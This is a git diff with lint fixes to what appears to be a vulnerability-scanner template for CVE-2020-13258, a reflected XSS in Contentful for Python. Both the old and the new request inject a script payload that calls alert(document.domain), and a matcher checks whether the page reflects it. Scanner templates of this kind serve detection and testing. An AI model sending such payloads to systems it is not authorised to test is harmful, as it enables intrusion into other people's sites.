lint fixes
parent
c3360c9d23
commit
6b30e12e86
|
@ -7,14 +7,14 @@ info:
|
||||||
description: Contentful through 2020-05-21 for Python allows reflected XSS.
|
description: Contentful through 2020-05-21 for Python allows reflected XSS.
|
||||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-13258
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-13258
|
||||||
tags: cve,cve2020,contentful,xss
|
tags: cve,cve2020,contentful,xss
|
||||||
requests:
|
|
||||||
- method: GET
|
|
||||||
path:
|
|
||||||
- '{{BaseURL}}/?cda'"<evil><script>alert(document.domain)</script>&locale=locale=de-DE'
|
|
||||||
|
|
||||||
matchers-condition: and
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /?cda'"<evil><script>alert(document.domain)</script>&locale=locale=de-DE HTTP/1.1 HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "<evil><script>alert(document.domain)</script>"
|
- "<evil><script>alert(document.domain)</script>"
|
||||||
condition: and
|
|
||||||
|
|
Loading…
Reference in New Issue